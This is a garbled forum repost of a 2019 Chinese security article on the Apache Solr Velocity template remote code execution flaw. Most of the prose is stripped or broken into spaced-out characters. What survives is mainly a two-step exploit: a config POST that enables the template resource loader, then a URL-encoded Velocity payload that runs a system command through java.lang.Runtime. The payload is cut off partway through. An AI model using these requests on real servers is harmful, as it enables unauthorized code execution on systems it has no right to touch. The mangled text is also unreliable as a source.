搜索

[95] 2019-11-24_简谈I今天传爆网安圈的ApacheSolrVelocity远程代码执行漏洞

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-15
2019-11-24_简谈I今天传爆网安圈的ApacheSolrVelocity远程代码执行漏洞 I A p a c h e   S o l r   V e l o c i t y A d m i n   T e a m   2 0 1 9 - 1 1 - 2 4   0 x 0 0 - A p a c h e   S o l r   A p a c h e   S o l r   A p a c h e   L u c e n e W o r d P D F S o l r S o l r S o l r   4 N o S Q L R E S T A P I S o l r J a v a S e r v l e t A p a c h e   T o m c a t J e t t y S o l r L u c e n e   J a v a R E S T H T T P / X M L J S O N A P I S o l r 使 J a v a 便 0 x 0 1 - A p a c h e   S o l r     V e l o c i t y R e s p o n s e W r i t e r     p a r a m s . r e s o u r c e . l o a d e r . e n a b l e d     S o l r     f a l s e 2 0 1 9 1 0 3 0 1 0 3 0 @ _ S 0 0 p Y A p a c h e   S o l r   V e l o c i t y 0 x 0 2 A p a c h e   S o l r   ( 8 . 2 . 0 7 . 7 . 2 ) S o l r h t t p s : / / c w i k i . a p a c h e . o r g / 0 x 0 3 - S o l r X M L J S O N C S V v e l o c i t y j s V e l o c i t y R e s p o n s e W r i t e r v e l o c i t y 便 / / c o n f i g P O S T p a r a m s . r e s o u r c e . l o a d e r . e n a b l e d t r u e 0 x 0 4 -   g i t h u b . c o m e x p 使 T i m e l i n e   S e c   .
S o l r C o r e g i t h u b . c o m e x p p o s t R e q u e s t : = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = P O S T   / s o l r / t e s t / c o n f i g   H T T P / 1 . 1 H o s t :   s o l r : 8 9 8 3 C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n C o n t e n t - L e n g t h :   2 5 9 {     " u p d a t e - q u e r y r e s p o n s e w r i t e r " :   {         " s t a r t u p " :   " l a z y " ,         " n a m e " :   " v e l o c i t y " ,         " c l a s s " :   " s o l r . V e l o c i t y R e s p o n s e W r i t e r " ,         " t e m p l a t e . b a s e . d i r " :   " " ,         " s o l r . r e s o u r c e . l o a d e r . e n a b l e d " :   " t r u e " ,         " p a r a m s . r e s o u r c e . l o a d e r . e n a b l e d " :   " t r u e "     } } = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
G e t e x p = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = R C E   v i a   v e l o c i t y   t e m p l a t e R e q u e s t : = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = G E T   / s o l r / t e s t / s e l e c t ? q = 1 & & w t = v e l o c i t y & v . t e m p l a t e = c u s t o m & v . t e m p l a t e . c u s t o m = % 2 3 s e t ( $ x = % 2 7 % 2 7 ) + % 2 3 s e t ( $ r t = $ x . c l a s s . f o r N a m e ( % 2 7 j a v a . l a n g . R u n t i m e % 2 7 ) ) + % 2 3 s e t ( $ c h r = $ x . c l a s s . f o r N a m e ( % 2 7 j a v a . l a n g . C h a r a c t e r % 2 7 ) ) + % 2 3 s e t ( $ s t r = $ x . c l a s s . f o r N a m e ( % 2 7 j a v a . l a n g . S t r i n g % 2 7 ) ) + % 2 3 s e t ( $ e x = $ r t . g e t R u n t i m e ( ) . e x e c ( % 2 7 i d % 2 7 ) ) + $ e x . w a i t F o r ( ) + % 2 3 s e t ( $ o u t = $ e x . g e t I n p u t S t r e a m ( ) ) + % 2 3 f o r e a c h ( $ i + i n + [ H o s t :   l o c a l h o s t : 8 9 8 3 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
0 x 0 5   s o l r 访 - x r a y 3 9 , E S P - 8 2 6 6 便 w i f i T i m e l i n e   S e c 线 线  
             
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理